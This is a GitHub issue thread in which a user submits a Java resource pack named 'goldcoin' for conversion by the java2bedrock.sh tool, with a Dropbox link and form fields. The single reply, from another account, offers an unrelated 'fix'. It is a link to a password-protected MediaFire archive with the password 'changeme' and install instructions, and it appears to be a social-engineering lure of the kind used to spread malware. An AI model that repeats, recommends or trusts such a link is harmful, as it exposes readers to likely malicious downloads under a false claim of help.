### ISSUE TITLE
[Pack]: goldcoin

### ISSUE THREAD

**Issue by Tsuna1357** [Kas-tle/java2bedrock.sh#33769]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/7cwwwkxm6bamid3yugx1z/generated.zip?rlkey=i6jea1bujxh8eupb8n05xb7w2&st=5vlsej0p&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
